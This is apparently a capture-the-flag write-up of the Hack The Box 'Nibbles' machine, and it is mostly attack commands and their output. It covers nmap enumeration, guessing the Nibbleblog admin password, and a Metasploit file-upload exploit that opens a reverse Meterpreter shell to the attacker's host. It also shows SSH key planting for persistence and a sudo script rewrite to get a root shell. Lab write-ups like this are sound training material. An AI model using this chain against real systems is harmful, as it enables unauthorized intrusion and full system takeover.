Welcome to the Nibbles writeup from HTB
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k
Nibbles
tags: HTB
Easy
Linux
OSCP
Platform: Hackthebox
Difficult: Easy
S.O.: Linux
Link: Click here
Enumeration
Nmap
To get started, we run a quick open ports scan.
# nmap -p- -T4 10.10.10.75
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-14 18:37 CET
Nmap scan report for 10.10.10.75
Host is up (0.094s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 37.53 seconds
Now that we know the open ports, let's scan them in depth.
# nmap -A -Pn -p 22,80 10.10.10.75
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-14 18:38 CET
Nmap scan report for 10.10.10.75
Host is up (0.094s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.12 (95%), Linux 3.13 (95%), Linux 3.16 (95%), Linux 3.18 (95%), Linux 3.2 - 4.9 (95%), Linux 3.8 - 3.11 (95%), Linux 4.4 (95%), Linux 4.2 (95%), Linux 4.8 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 93.73 ms 10.10.14.1
2 93.67 ms 10.10.10.75
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.32 seconds
As we can see, there are a web server in the port 80 and a SSH server in the default port 22.
Let's explore the website.
Accesing to the website, we only can read Hello world!
but, looking inside the source code, we can find a nibbleblog
directory.
<b>Hello world!</b>
<!-- /nibbleblog/ directory. Nothing interesting here! -->
Nibbleblog
In this URL we can find that there is a blog installed with Nibbleblog
as we can read in Powered by Nibbleblog
Using searchsploit
we can find two available exploits.
# searchsploit nibbleblog
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Nibbleblog 3 - Multiple SQL Injections | php/webapps/35865.txt
Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit) | php/remote/38489.rb
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Papers: No Results
The File Upload
vulnerability needs an account. After much searching around the server without success, I have tried various passwords for the admin
user and managed to log in with the box namenibbles
as the password. I did not like this point ... it is not realistic at all.
Exploitation
It's time to use the File Upload
vulnerability with Metasploit
.
msf6 exploit(multi/http/nibbleblog_file_upload) > set USERNAME admin
USERNAME => admin
msf6 exploit(multi/http/nibbleblog_file_upload) > set PASSWORD nibbles
PASSWORD => nibbles
msf6 exploit(multi/http/nibbleblog_file_upload) > set RHOSTS 10.10.10.75
RHOSTS => 10.10.10.75
msf6 exploit(multi/http/nibbleblog_file_upload) > set TARGETURI /nibbleblog/
TARGETURI => /nibbleblog/
msf6 exploit(multi/http/nibbleblog_file_upload) > set LHOST 10.10.14.9
LHOST => 10.10.14.9
msf6 exploit(multi/http/nibbleblog_file_upload) > run
[*] Started reverse TCP handler on 10.10.14.9:4444
[*] Sending stage (39282 bytes) to 10.10.10.75
[*] Meterpreter session 1 opened (10.10.14.9:4444 -> 10.10.10.75:53234) at 2021-03-14 20:54:10 +0100
[+] Deleted image.php
meterpreter > shell
Process 1649 created.
Channel 0 created.
id
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
python3 -c "import pty; pty.spawn('/bin/bash')"
nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$
And now, in the nibbler
home, we can get the user.txt
flag.
nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ cat /home/nibbler/user.txt
CENSORED_FLAG
Post exploitation
Let's upgrade to SSH injecting our SSH key.
nibbler@Nibbles:/home/nibbler$ mkdir .ssh
nibbler@Nibbles:/home/nibbler$ cd .ssh/
nibbler@Nibbles:/home/nibbler/.ssh$ echo "KZwNCA7nI0th*****************5E1wl2EByci0=" > authorized_keys
nibbler@Nibbles:/home/nibbler/.ssh$
Enumeration
Sudo
nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ sudo -l
sudo: unable to resolve host Nibbles: Connection timed out
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
It seems we can run the monitor.sh
script as root without password.
Privilege escalation
nibbler@Nibbles:~$ mkdir -p personal/stuff
nibbler@Nibbles:~$ cd personal/stuff/
nibbler@Nibbles:~/personal/stuff$ echo "/bin/bash -i" > monitor.sh
nibbler@Nibbles:~/personal/stuff$ chmod +x monitor.sh
nibbler@Nibbles:~/personal/stuff$ sudo /home/nibbler/personal/stuff/monitor.sh
sudo: unable to resolve host Nibbles: Connection timed out
root@Nibbles:~/personal/stuff# id
uid=0(root) gid=0(root) groups=0(root)
root@Nibbles:~/personal/stuff# cat /root/root.txt
CENSORED_FLAG
And that's all folks!